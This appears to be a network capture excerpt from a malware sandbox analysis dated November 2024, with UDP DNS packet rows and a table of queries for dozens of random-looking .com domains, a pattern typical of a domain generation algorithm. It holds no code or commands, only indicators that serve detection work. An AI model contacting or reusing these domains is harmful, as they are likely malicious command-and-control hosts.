                                                                                                                                                                                                            Nov 11, 2024 18:25:28.569633007 CET5135753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.572315931 CET53493761.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.572679996 CET5122153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.573296070 CET53557421.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.573391914 CET53633851.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.574559927 CET53652121.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.575902939 CET6469253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.577004910 CET53630451.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.581504107 CET53576181.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.594894886 CET53492601.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.599929094 CET53654641.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.601052999 CET53513571.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.604123116 CET53512211.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.608092070 CET53646921.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.892950058 CET5471153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.893636942 CET4915553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.905105114 CET5022853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.910080910 CET4917453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.912800074 CET5428053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.913652897 CET5873453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.913682938 CET5258753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.914361954 CET5576553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.914479971 CET5209153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.914877892 CET5970153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.915008068 CET6494353192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.915144920 CET53502281.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.915422916 CET6146853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.915882111 CET5586953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.916062117 CET5944453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.916804075 CET6490253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.919644117 CET6190053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.920253992 CET5327553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.920655966 CET6451453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.921025038 CET5271353192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.921107054 CET53491741.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.921431065 CET5279553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.921957970 CET5471353192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.922494888 CET5660053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.922941923 CET53542801.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.923000097 CET6395253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.923175097 CET6435553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.923973083 CET53587341.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.925139904 CET53547111.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.925152063 CET53557651.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.925894976 CET53491551.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.926052094 CET53520911.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.926512003 CET53614681.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.930674076 CET53566001.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.931360960 CET53532751.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.932070971 CET53645141.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.932081938 CET53527951.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.932725906 CET53639521.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.933398962 CET53547131.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.933844090 CET53643551.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.938256979 CET53619001.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.939485073 CET53649431.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.942986012 CET5613653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.944993973 CET5079253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.440248966 CET5023753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.440471888 CET53649841.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.440696955 CET53544401.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.440804958 CET53642951.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.440855980 CET53548721.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.440867901 CET53497771.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.441168070 CET53576081.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.441406965 CET53518961.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.441704988 CET53502641.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.441971064 CET5605553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.442020893 CET53576091.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.442256927 CET53594051.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.442606926 CET53601741.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.442863941 CET53576191.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.443377018 CET53585721.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.443886995 CET53609021.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.444417953 CET5420053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.444479942 CET4995353192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.445278883 CET6473153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.445754051 CET53538741.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.445879936 CET5387253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.446551085 CET5709953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.446806908 CET53593991.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.447200060 CET53502371.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.448084116 CET5650453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.448431969 CET5967753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.448622942 CET5601553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.448704958 CET5474053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.448898077 CET5639453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.449328899 CET6112253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.449351072 CET5152053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.449613094 CET5542253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.449877024 CET5152153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.449997902 CET53601891.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.450001955 CET5905153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.450458050 CET5351353192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.450629950 CET5616753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.450860023 CET5162753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.452019930 CET6511053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.452150106 CET5982653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.452233076 CET53560551.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.452513933 CET6459853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.453958988 CET53570991.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.455502033 CET53647311.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.455687046 CET53538721.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.456769943 CET53515201.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.458678961 CET53554221.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.458692074 CET53560151.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.458862066 CET53500771.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.458920956 CET53611221.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.458952904 CET53596771.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.459909916 CET53568961.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.460108042 CET53516271.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.460119963 CET53515211.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.460231066 CET53561671.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.460659981 CET53630191.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.460697889 CET5757853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.460766077 CET53645981.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.460918903 CET53547401.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.461759090 CET53598261.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.461896896 CET53536701.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.461934090 CET53581861.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.462289095 CET53651101.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.462373972 CET53512851.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.462409019 CET53632411.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.462713003 CET53537551.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.462743998 CET53541821.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.462868929 CET5990253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.463624001 CET53504571.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.463980913 CET53499531.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.464242935 CET5493653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.464263916 CET53555491.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.464889050 CET5045053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.466010094 CET5938553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.466289043 CET53564491.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.472718954 CET53599021.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.475810051 CET53593851.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.476372957 CET53542001.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.478637934 CET4966653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.478755951 CET6131153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.479015112 CET53565041.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.479387045 CET5416253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.479523897 CET5295353192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.479967117 CET53563941.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.481512070 CET53590511.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.482067108 CET53535131.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.488640070 CET53496661.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.489154100 CET53541621.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.489172935 CET53529531.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.489439964 CET5242953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.494251013 CET53575781.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.496804953 CET53549361.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.498106956 CET53504501.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.499052048 CET53524291.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.511641979 CET53613111.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.552287102 CET6521553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.552767992 CET6450553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.565197945 CET53652151.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.568840027 CET5391053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.569998980 CET6369653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.570137024 CET6029053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.576061010 CET5586253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.576370955 CET6449253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.577182055 CET5678853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.582142115 CET53602901.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.326090097 CET53536231.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.394615889 CET53542591.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.398926020 CET53500341.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.429943085 CET53515831.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.457834005 CET53567581.1.1.1192.168.2.10
Timestamp    Source IP    Dest IP    Trans ID    OP Code    Name    Type    Class    DNS over HTTPS
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.121646881 CET192.168.2.101.1.1.10x1683Standard query (0)gaqypiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.121768951 CET192.168.2.101.1.1.10x66aeStandard query (0)vopycom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.121815920 CET192.168.2.101.1.1.10x71adStandard query (0)lyxymin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.121979952 CET192.168.2.101.1.1.10x5adStandard query (0)lygynud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.122004032 CET192.168.2.101.1.1.10x2ba7Standard query (0)lykygur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.122137070 CET192.168.2.101.1.1.10x757cStandard query (0)qebyrev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.122232914 CET192.168.2.101.1.1.10xb792Standard query (0)gatycoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.122349977 CET192.168.2.101.1.1.10x4777Standard query (0)lyvywed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.135391951 CET192.168.2.101.1.1.10x11bStandard query (0)puvywav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.136482954 CET192.168.2.101.1.1.10x193fStandard query (0)gacyqob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.136703968 CET192.168.2.101.1.1.10x7c8dStandard query (0)vojygut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.136887074 CET192.168.2.101.1.1.10x1ac7Standard query (0)qetyxiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.137048006 CET192.168.2.101.1.1.10xa1ffStandard query (0)vowyzuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.137207985 CET192.168.2.101.1.1.10xd5e9Standard query (0)pufydep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.137444019 CET192.168.2.101.1.1.10xccdeStandard query (0)lyxyjaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.139664888 CET192.168.2.101.1.1.10xf575Standard query (0)pumytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.139879942 CET192.168.2.101.1.1.10x3b84Standard query (0)vowypit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.140053988 CET192.168.2.101.1.1.10xf9bcStandard query (0)purypol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.140450954 CET192.168.2.101.1.1.10x4c7bStandard query (0)qeqytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.140656948 CET192.168.2.101.1.1.10x93e8Standard query (0)puzyjoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.140841007 CET192.168.2.101.1.1.10xd433Standard query (0)vofybyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.141026974 CET192.168.2.101.1.1.10x6d83Standard query (0)lygyfex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.141165018 CET192.168.2.101.1.1.10xcda3Standard query (0)puryxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.141307116 CET192.168.2.101.1.1.10x6216Standard query (0)gaqyzuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.141457081 CET192.168.2.101.1.1.10xd034Standard query (0)vocyqaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.141596079 CET192.168.2.101.1.1.10xd15bStandard query (0)lyryxij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.150409937 CET192.168.2.101.1.1.10xecb9Standard query (0)lymytux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.150588036 CET192.168.2.101.1.1.10xda94Standard query (0)lysyvan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.151690006 CET192.168.2.101.1.1.10xcb7eStandard query (0)gadyveb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.151912928 CET192.168.2.101.1.1.10xfc3dStandard query (0)qedyveg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.152066946 CET192.168.2.101.1.1.10x3585Standard query (0)gacykeh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.152105093 CET192.168.2.101.1.1.10xcb28Standard query (0)ganyrys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.153012991 CET192.168.2.101.1.1.10xebecStandard query (0)volyjok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:16.998486996 CET192.168.2.101.1.1.10x55cfStandard query (0)qexynyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:16.998717070 CET192.168.2.101.1.1.10xa46dStandard query (0)lyxynyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:16.999821901 CET192.168.2.101.1.1.10x88beStandard query (0)gaqykab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.002121925 CET192.168.2.101.1.1.10xbebaStandard query (0)vocymut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.007819891 CET192.168.2.101.1.1.10x2832Standard query (0)gacynuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.008665085 CET192.168.2.101.1.1.10x1b92Standard query (0)qegysoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.012741089 CET192.168.2.101.1.1.10x3ccStandard query (0)lyryled.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.021445990 CET192.168.2.101.1.1.10x24faStandard query (0)vowykaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.045924902 CET192.168.2.101.1.1.10x212fStandard query (0)vojydam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.048953056 CET192.168.2.101.1.1.10x14fdStandard query (0)purylev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.050997972 CET192.168.2.101.1.1.10x27a7Standard query (0)pupyxup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.051579952 CET192.168.2.101.1.1.10x3eb5Standard query (0)puvymul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.062500954 CET192.168.2.101.1.1.10x898aStandard query (0)lykynyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.085716009 CET192.168.2.101.1.1.10xf333Standard query (0)pupypiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.086219072 CET192.168.2.101.1.1.10xbb8Standard query (0)gatypub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.097089052 CET192.168.2.101.1.1.10x9cecStandard query (0)lyxygud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.097523928 CET192.168.2.101.1.1.10x53d6Standard query (0)vofycot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.099051952 CET192.168.2.101.1.1.10xec7fStandard query (0)gaqyreh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.099971056 CET192.168.2.101.1.1.10x920aStandard query (0)qekyfeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.100871086 CET192.168.2.101.1.1.10xfd06Standard query (0)vonyqok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.102935076 CET192.168.2.101.1.1.10x2a54Standard query (0)pufycol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.103333950 CET192.168.2.101.1.1.10xf6c0Standard query (0)gacyhis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.106138945 CET192.168.2.101.1.1.10x7e2dStandard query (0)qegyval.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.106456041 CET192.168.2.101.1.1.10x8a2dStandard query (0)purytyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.107441902 CET192.168.2.101.1.1.10xfdbbStandard query (0)lyrytun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.107947111 CET192.168.2.101.1.1.10x3c28Standard query (0)qexyhuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.108340979 CET192.168.2.101.1.1.10x5611Standard query (0)lygyvar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.109929085 CET192.168.2.101.1.1.10xe524Standard query (0)vocyjic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.112447977 CET192.168.2.101.1.1.10x8a9fStandard query (0)gahyvew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.112998962 CET192.168.2.101.1.1.10x8497Standard query (0)galyfyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.113352060 CET192.168.2.101.1.1.10x5ab9Standard query (0)lyvymir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.114106894 CET192.168.2.101.1.1.10x417eStandard query (0)vowyrym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.120963097 CET192.168.2.101.1.1.10xa160Standard query (0)volygyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.121244907 CET192.168.2.101.1.1.10xc22dStandard query (0)qedyxip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.124156952 CET192.168.2.101.1.1.10x9494Standard query (0)pumywaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.125891924 CET192.168.2.101.1.1.10x8156Standard query (0)pujydag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.126101017 CET192.168.2.101.1.1.10xb5aStandard query (0)gahydoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.129201889 CET192.168.2.101.1.1.10x66c0Standard query (0)qebyqil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.129405022 CET192.168.2.101.1.1.10x30d5Standard query (0)ganyqow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.129729033 CET192.168.2.101.1.1.10xf293Standard query (0)qedysov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.130438089 CET192.168.2.101.1.1.10x37e7Standard query (0)lysysod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.130765915 CET192.168.2.101.1.1.10xf8a1Standard query (0)vopyzuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.130964994 CET192.168.2.101.1.1.10xb7c9Standard query (0)galynuh.comA (IP address)IN (0x0001)false
